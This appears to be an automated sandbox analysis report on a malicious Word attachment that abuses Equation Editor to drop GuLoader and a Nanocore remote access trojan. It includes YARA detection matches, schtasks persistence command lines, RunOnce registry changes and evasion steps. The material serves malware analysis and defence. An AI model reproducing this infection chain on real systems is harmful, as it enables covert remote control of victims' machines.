Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0056700B LoadLibraryA,NtProtectVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566FCB NtProtectVirtualMemory,CreateThread,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566FB1 NtProtectVirtualMemory,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566599
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C438C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C498F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C48C98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C49C03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C42418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C4B5C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C430E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C43020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00C499B7
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 14_2_005501B7
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_002101B7
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409851
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040987E
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409828
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004098D6
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040990A
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409932
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004099DD
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040998E
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004099B7
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409A62
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409A09
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409AC1
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409AF2
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409A94
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409B48
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040976B
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409B1E
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409739
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409BC3
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004097CB
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004093F4
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_004097FA
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00409798
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_00405934

Source: filename1.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@16/25@6/3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ AAN2102002-V020.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB605.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................).........E.R.R.O.R.:. ...t...............T...............................................h. .......................).....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................).........E.R.R.O.(.P.....t...............T.......................................................X.......h.'.......).....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................8.......(.P.............t.......T.......e.................................................................(.....

Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\subfolder1\filename1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\subfolder1\filename1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO AAN2102002-V020.doc

ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp678.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: unknown	Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp678.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: PO AAN2102002-V020.doc

Static file information: File size 1297796 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.5.dr
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000005.00000002.2342579260.0000000000220000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000005.00000002.2342821040.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E5E25 push esp; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E9D68 pushad ; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E9D64 push eax; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E74A8 push ebp; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E749C push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_003E9880 push ecx; retf 003Eh
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566C41 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566C27 push eax; ret
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 14_2_0028A120 push 7B2DC3FCh; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040E4E3 push ecx; ret
Source: C:\Users\user\subfolder1\filename1.exe	Code function: 19_2_0040BE2F push esi; ret

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\TFppy[1].txt	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Users\user\subfolder1\filename1.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\TFppy[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp'

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
